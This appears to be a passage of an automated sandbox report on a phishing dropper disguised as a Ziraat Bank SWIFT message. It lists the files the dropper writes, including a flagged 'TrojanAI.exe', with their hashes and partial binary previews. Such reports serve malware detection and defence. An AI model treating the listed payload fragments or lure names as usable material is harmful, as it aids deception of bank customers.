Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Lityerses

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	data
Category:	modified
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\TrojanAI.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: Order SMG 201906 20190816order.pdf.scr.exe, Detection: malicious, Browse Filename: 2jbMIxCFsK.exe, Detection: malicious, Browse Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: server_BTC.exe, Detection: malicious, Browse Filename: x.exe, Detection: malicious, Browse Filename: server_BTC.exe, Detection: malicious, Browse Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d4g5ayw.2at.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exfq5ou4.ovf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4wxs0zy.skv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys55iocw.hbc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aut8747.tmp

Download File

Process:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\aut8B4E.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\autC384.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\autCC4E.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\autD140.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
Preview:	...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB0A/3H.%CZR.RJVO0N.4N3HDHCZRTSJVD.0N..R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0

C:\Users\user\AppData\Local\Temp\autD5A5.tmp

Download File

Process:	C:\Users\user\AppData\Local\bothsided\spadixes.exe
File Type:	data
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.98998888129021
Encrypted:	false
SSDEEP:	24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
MD5:	8064E730487A7492200F210D929C8423
SHA1:	65C892BE84C7B59DA335981E8B86CE5A53B40B6D
SHA-256:	1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
SHA-512:	A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
Malicious:	false
